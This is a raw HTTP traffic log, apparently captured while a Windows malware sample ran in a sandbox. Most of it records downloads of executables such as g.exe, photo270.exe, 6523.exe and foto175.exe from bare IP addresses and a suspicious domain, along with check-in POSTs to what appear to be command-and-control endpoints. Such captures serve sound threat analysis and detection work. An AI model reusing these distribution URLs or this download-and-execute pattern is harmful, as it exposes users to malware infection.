HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 04 Jul 2023 02:06:52 GMT Content-Type: application/octet-stream Content-Length: 250880 Last-Modified: Sun, 02 Jul 2023 23:27:12 GMT Connection: keep-alive ETag: "64a207d0-3d400" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Tue, 04 Jul 2023 03:06:52 GMT Date: Tue, 04 Jul 2023 02:06:52 GMT Connection: keep-alive

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "60200-64a37d22-60e81;;;" last-modified: Tue, 04 Jul 2023 02:00:02 GMT content-type: application/x-executable content-length: 393728 accept-ranges: bytes date: Tue, 04 Jul 2023 02:06:52 GMT server: LiteSpeed connection: Keep-Alive

GET /gallery/photo270.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.31 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 04 Jul 2023 10:03:04 GMT Accept-Ranges: bytes ETag: "4a7b80b95eaed91:0" Server: Microsoft-IIS/10.0 Date: Tue, 04 Jul 2023 10:06:52 GMT Content-Length: 831816

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 04 Jul 2023 02:06:53 GMT Content-Type: application/octet-stream Content-Length: 293888 Last-Modified: Tue, 04 Jul 2023 02:00:02 GMT Connection: keep-alive ETag: "64a37d22-47c00" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:06:54 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="2mp5achwqvgquos.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 04 Jul 2023 02:06:53 GMT Content-Type: application/octet-stream Content-Length: 293888 Last-Modified: Tue, 04 Jul 2023 02:00:02 GMT Connection: keep-alive ETag: "64a37d22-47c00" Accept-Ranges: bytes

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 541 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:07:36 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:07:38 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:07:39 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Tue, 04 Jul 2023 02:07:39 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 04 Jul 2023 03:07:39 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7e13d0e00ac0c18a-ICN

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-sQm9KhW-seGSo1TGydXdBQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:03 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFsRuZXwzhW7XCRd7ISh-TTaA_ERlujR4i-t-8dEjyNF_LSXUheXg; expires=Sun, 31-Dec-2023 02:08:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=tWj7agFrvog4mOinUWOe-klPrU22A1pbUWM585XquyGphRBLPYR5qZoWmDXwRsd-3oyNPH2EaGCBzg53ecWpgGJ1v-pJkFuD6s2GnzATG81BHeOVthYaqw1OHSPbIzOzISgzaXyydoVPwkxBol5onY1uXE3JjrpV0xSENccDWwI; expires=Wed, 03-Jan-2024 02:08:03 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-zopXskPYrH6aF1nXaERjlg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:03 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFBzOR07MA4vJt4fpCF8-o2Pxgvsyf8X6nKc7fKXugCmATgBt21Rw; expires=Sun, 31-Dec-2023 02:08:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=dYN6OFoTI66QDY2N4wKZJL8iAXGlObQGrhFMzNrbMO4yTJZocSyC5_viqAIpL9n83MitQcJJxKKHgHnkg2K7nYMp8e3CzTl4VoC7tS_Oqm1MIHBueTAcgYlUy3toJwqCrpgXSRc6lPyQ38CT5Dxl6FFxTL1QqkVOeygs44bpM1c; expires=Wed, 03-Jan-2024 02:08:03 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-fvnJxaTtSXsTSRR4PzxD0w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2320 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:03 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVGrCJ310RqV_kZpBE3yI3iPaevORT-A_NdZJ4wdSeLr3Kpy0DYK-g; expires=Sun, 31-Dec-2023 02:08:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=bQTpTxcDnsZMEoofktb4kt1tNChxF7E3CTCRB5dNsCa2jKY7ta3wKIVXps_yWFLb8bv9HML3e9OB20meANvT0l4oiNpVatQ8p9yoJyXDeVuiV3QrNlYHdDuWPXdndbGy-St0V4wSCJhO48OAC5k2vrNXZs8MqBvUbBSde990s7o; expires=Wed, 03-Jan-2024 02:08:03 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ntwmgZyvWlDuVhygEqGLZg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:03 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVGOtbAFcSX9c0H43TovknMKtM0_ElJpUrp-kQGmn-0YGU4TW4IEIA; expires=Sun, 31-Dec-2023 02:08:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=vybbtH6pR7MtY39hfnIJl0fSXKvi2mLj4GXbmpwd5USjF_FFgeEPsAtEn5xI3dV9WQKxfiU0bYaoDi9xOMaBVBYIPYIaSfTht8eJNbPuommv1efMV3C05ls0CWzHHk1ubLROXIzOpuz60uCTB04VcyhPMVWw-zaBROmMuWrt-WM; expires=Wed, 03-Jan-2024 02:08:03 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:03 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-AhRVgNBHPNV-LI7eYJSQbg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:03 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVEAIYrzAAaWshhbDfehEymacpVeKOKPcW-m0msbIEzjNtmAAhjSWg; expires=Sun, 31-Dec-2023 02:08:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=Hw-9ofBC-fhFCfY0rAXvUjyGGJ268L28xUj2vBZ0LB3B-CGcuCrcqOS6lG_n6J5fui47hv7H4BY0tpXWuH5DlqFBJ49cLrTzgg6Pb4uSHAfSt6pED-ODtkibfre_q_NvELeAyRTFwJa02WK3YLXhM-WQwldu4T2JwZLBmvrcvzg; expires=Wed, 03-Jan-2024 02:08:03 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:04 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ed4tDwc84lRtpfYXeWEuvw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-04-02; expires=Thu, 03-Aug-2023 02:08:04 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVHzvjT79nSDRVxa89Ni9u3K_cvo1UTu9RBBIfUAu4a6NUbTr6T7e5A; expires=Sun, 31-Dec-2023 02:08:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=TPRrTnjtZLvOHJgAgQea6bOjsj2HiZQaiu0UqyyY1p5IUzjITLMEDO6V6wKGPPgyPFGtrv27pDNhExUs_CEyMm2VQSQXrwECvkyvdhA4Zfo5F1mWbDLq6D_8wiRU0VCZVrQVm3jkdrOKgBsgq4wSsDi3I6UEeEUd2cPn7ybIMXI; expires=Wed, 03-Jan-2024 02:08:04 GMT; path=/; domain=.google.com; HttpOnly

POST /doma/net/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.63 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 04 Jul 2023 02:08:23 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 188 Content-Type: text/html; charset=UTF-8

GET /new/foto175.exe HTTP/1.1 Host: 77.91.68.157

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 04 Jul 2023 10:08:12 GMT Accept-Ranges: bytes ETag: "033b6705faed91:0" Server: Microsoft-IIS/10.0 Date: Tue, 04 Jul 2023 10:08:23 GMT Content-Length: 527688